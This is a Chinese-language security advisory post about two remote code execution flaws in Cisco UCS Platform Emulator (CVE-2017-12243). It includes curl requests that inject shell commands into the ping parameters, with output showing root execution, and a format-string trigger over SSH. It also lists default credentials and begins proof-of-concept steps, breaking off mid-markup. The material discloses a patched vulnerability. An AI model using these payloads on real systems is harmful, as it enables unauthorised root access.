{"id":10484,"date":"2017-11-14T14:19:28","date_gmt":"2017-11-14T22:19:28","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/11\/14\/news-4256\/"},"modified":"2017-11-14T14:19:28","modified_gmt":"2017-11-14T22:19:28","slug":"news-4256","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/11\/14\/news-4256\/","title":{"rendered":"SSD\u5b89\u5168\u516c\u544a-\u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u5668\u8fdc\u7a0b\u4ee3"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 14 Nov 2017 12:27:06 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3525\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3525');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>\u6f0f\u6d1e\u6982\u8981<\/strong><br \/> \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728\u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u56683.1(2ePE1)\u4e2d\u53d1\u73b0\u7684\u4e24\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002<\/p>\n<p>\u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u5668\u662f\u6346\u7ed1\u5230\u865a\u62df\u673a(VM)\u4e2d\u7684Cisco UCS Manager\u5e94\u7528\u7a0b\u5e8f\uff0cVM\u5305\u542b\u6a21\u62df\u601d\u79d1\u7edf\u4e00\u8ba1\u7b97\u7cfb\u7edf\uff08Cisco UCS\uff09\u786c\u4ef6\u901a\u4fe1\u7684\u8f6f\u4ef6\uff0c\u601d\u79d1\u7edf\u4e00\u8ba1\u7b97\u7cfb\u7edf\uff08Cisco UCS\uff09\u786c\u4ef6\u7531\u601d\u79d1UCS Manager\u914d\u7f6e\u548c\u7ba1\u7406\u3002 \u4f8b\u5982\uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528\u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u5668\u6765\u521b\u5efa\u548c\u6d4b\u8bd5\u652f\u6301\u7684\u601d\u79d1UCS\u914d\u7f6e\uff0c\u6216\u8005\u590d\u5236\u73b0\u6709\u7684\u601d\u79d1UCS\u73af\u5883\uff0c\u4ee5\u8fdb\u884c\u6545\u969c\u6392\u9664\u6216\u5f00\u53d1\u3002<\/p>\n<p>\u5728\u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u5668\u4e2d\u53d1\u73b0\u7684\u6f0f\u6d1e\u662f\uff1a<\/p>\n<ul>\n<li>\u672a\u7ecf\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e<\/li>\n<li>\u7ecf\u8ba4\u8bc1\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e<\/li>\n<\/ul>\n<p>\u4e00\u540d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u8005\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e\u3002<\/p>\n<p><strong>\u5382\u5546\u54cd\u5e94<\/strong><br \/> \u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01\uff0c\u5e76\u53d1\u5e03\u4ee5\u4e0bCVE\uff1a CVE-2017-12243<\/p>\n<p><u><strong>\u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f<\/strong><\/u><\/p>\n<p><strong>\u672a\u7ecf\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e<\/strong><br \/> \u7531\u4e8e\u7528\u6237\u7684\u8f93\u5165\u5728\u4f20\u9012\u7ed9IP\/settings\/ping\u51fd\u6570\u65f6\u6ca1\u6709\u8fdb\u884c\u5145\u5206\u7684\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7ping_NUM\u548cping_IP_ADDR\u53c2\u6570\u6ce8\u5165\u547d\u4ee4\uff0c\u8fd9\u4e9b\u547d\u4ee4\u5c06\u5728\u8fdc\u7a0b\u673a\u5668\u4e0a\u4ee5root\u8eab\u4efd\u6267\u884c\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u8bc1\u660e<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6bef4a4c9400765574\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> curl &#8220;http:\/\/IP\/settings\/ping?ping_num=1&amp;ping_ip_addr=127.0.0.1%3buname+-a%3b#&#8221;  curl -k &#8220;https:\/\/IP\/settings\/ping?ping_num=1&amp;ping_ip_addr=127.0.0.1%3buname+-a%3b#&#8221;  curl &#8220;http:\/\/IP\/settings\/ping?ping_num=1%3bid%3b#&amp;ping_ip_addr=127.0.0.1&#8221;  curl -k &#8220;https:\/\/IP\/settings\/ping?ping_num=1%3buname+-a%3b#&amp;ping_ip_addr=127.0.0.1&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p>\u901a\u8fc7\u53d1\u9001\u4ee5\u4e0a\u8bf7\u6c42\u4e4b\u4e00\u540e\uff0c\u601d\u79d1 UCS\u54cd\u5e94\u5982\u4e0b\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6bef4a4d1167500410\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/sample output\/  ================  demo@kali:~\/poc$ curl -k &#8220;http:\/\/IP\/settings\/ping?ping_num=1&amp;ping_ip_addr=127.0.0.1%3buname+-a%3b#&#8221;  PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.  64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms    &#8212; 127.0.0.1 ping statistics &#8212;  1 packets transmitted, 1 received, 0% packet loss, time 0ms  rtt min\/avg\/max\/mdev = 0.017\/0.017\/0.017\/0.000 ms  Linux ucspe 2.6.32-431.el6.i686 #1 SMP Fri Nov 22 00:26:36 UTC 2013 i686 i686 i386 GNU\/Linux    demo@kali:~\/poc$ curl &#8220;http:\/\/IP\/settings\/ping?ping_num=1%3bid%3b#&amp;ping_ip_addr=127.0.0.1&#8221;  uid=0(root) gid=0(root) groups=0(root)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4d1167500410-13\">13<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4d1167500410-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">sample <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-o\">\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4d1167500410-2\"><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4d1167500410-3\"><span class=\"crayon-v\">demo<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">kali<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">poc<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">k<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http:\/\/IP\/settings\/ping?ping_num=1&amp;ping_ip_addr=127.0.0.1%3buname+-a%3b#&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4d1167500410-4\"><span class=\"crayon-i\">PING<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">56<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">84<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bytes <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4d1167500410-5\"><span class=\"crayon-cn\">64<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bytes <\/span><span class=\"crayon-i\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">icmp_seq<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ttl<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">64<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">time<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.017<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ms<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4d1167500410-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4d1167500410-7\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ping <\/span><span class=\"crayon-v\">statistics<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4d1167500410-8\"><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">packets <\/span><span class=\"crayon-v\">transmitted<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">received<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">packet <\/span><span class=\"crayon-v\">loss<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">time<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0ms<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4d1167500410-9\"><span class=\"crayon-e\">rtt <\/span><span class=\"crayon-v\">min<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">avg<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">max<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mdev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0.017<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0.017<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0.017<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0.000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ms<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4d1167500410-10\"><span class=\"crayon-e\">Linux <\/span><span class=\"crayon-i\">ucspe<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2.6.32<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">431.el6.i686<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#1 SMP Fri Nov 22 00:26:36 UTC 2013 i686 i686 i386 GNU\/Linux<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4d1167500410-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4d1167500410-12\"><span class=\"crayon-v\">demo<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">kali<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">poc<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http:\/\/IP\/settings\/ping?ping_num=1%3bid%3b#&amp;ping_ip_addr=127.0.0.1&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4d1167500410-13\"><span class=\"crayon-v\">uid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">groups<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0021 seconds] -->  <\/p>\n<p><strong>\u7ecf\u8ba4\u8bc1\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e<\/strong><\/p>\n<p>\u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u5668\u5bb9\u6613\u53d7\u5230\u683c\u5f0f\u5b57\u7b26\u4e32\u6f0f\u6d1e\u7684\u653b\u51fb\uff0c\u5bfc\u81f4\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002<\/p>\n<p>\u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u5668\u9ed8\u8ba4\u8fd0\u884c\u4e00\u4e2aSSH\u670d\u52a1\u5668\uff0c\u901a\u8fc7ssh\u767b\u5f55\u7684\u7528\u6237\u8fd0\u884c\u4ee5\u4e0b\u547d\u4ee4\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6bef4a4d5345754054\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> show sel %x<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4d5345754054-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4d5345754054-1\"><span class=\"crayon-e\">show <\/span><span class=\"crayon-v\">sel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">x<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>\u5f97\u5230\u4e0b\u9762\u7684\u54cd\u5e94\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6bef4a4d7957507810\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;Error: Invalid rack server value: &#8230;somedigits..&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4d7957507810-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4d7957507810-1\"><span class=\"crayon-s\">&#8220;Error: Invalid rack server value: &#8230;somedigits..&#8221;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0001 seconds] -->  <\/p>\n<p>\u53ef\u4ee5\u770b\u5230\uff0c\u901a\u8fc7\u6267\u884cssh\u201cshow sel %x\u201d\u547d\u4ee4\uff0c\u6211\u4eec\u7528libsamvsh.so\u4e2d\u7684system\u51fd\u6570\u8986\u5199\u4e86_ZN7clidcos15CommandEmulator16cli_param_filterEPKc\u51fd\u6570\u7684\u5165\u53e3\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u8bc1\u660e<\/strong><br \/> \u4e3a\u4e86\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u8bf7\u6309\u7167\u4ee5\u4e0b\u8bf4\u660e\u64cd\u4f5c\uff1a<\/p>\n<p>\u4f7f\u7528\u4ee5\u4e0b\u7528\u6237\u540d\u548c\u5bc6\u7801\u5728vm\u4e0a\u5b89\u88c5ucspe\uff08\u5b89\u88c5\u5168\u90e83\u4e2a\u7f51\u5361\uff09\uff1a<\/p>\n<ul>\n<li>\u9ed8\u8ba4\u7684ucspe\u7528\u6237\uff1aucspe<\/li>\n<li>\u9ed8\u8ba4\u7684ucspe\u5bc6\u7801\uff1aucspe <\/li>\n<\/ul>\n<p>\u8fd0\u884cucspe\u5e76\u8bb0\u4e0bucspe\u7684ip\u5730\u5740\uff08\u5728\u63a7\u5236\u53f0\u53ef\u4ee5\u770b\u5230\u201cConnected to IP: \u2026.\u201d\uff09<\/p>\n<p>\u5728\u8fd9\u6b21\u6f0f\u6d1e\u8bc1\u660e\u4e2d\uff0c\u6211\u4eec\u5c06\u4f1a\u4f7f\u7528ip-192.168.1.43\u3002<\/p>\n<p>\u5728\u53e6\u4e00\u53f0\u673a\u5668\u4e0a\u6253\u5f00\u4e24\u4e2a\u7ec8\u7aef\uff08\u4f8b\u5982Kali\uff09<\/p>\n<p>\u9996\u5148\uff0c\u5728\u7b2c\u4e00\u4e2a\u7ec8\u7aef\u4e0a\u6267\u884c\u5982\u4e0b\u64cd\u4f5c\uff1a<\/p>\n<ol>\n<li>\u521b\u5efapoc\u76ee\u5f55\uff0c\u5c06poc4_ucspe_3.1.2e.py\u653e\u5165poc\u76ee\u5f55\uff0c\u7136\u540e\u5c06\u5f53\u524d\u76ee\u5f55\u6539\u4e3apoc\u76ee\u5f55<\/li>\n<li>\u521b\u5efafifo1\uff1a<\/li>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6bef4a4da841046670\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button 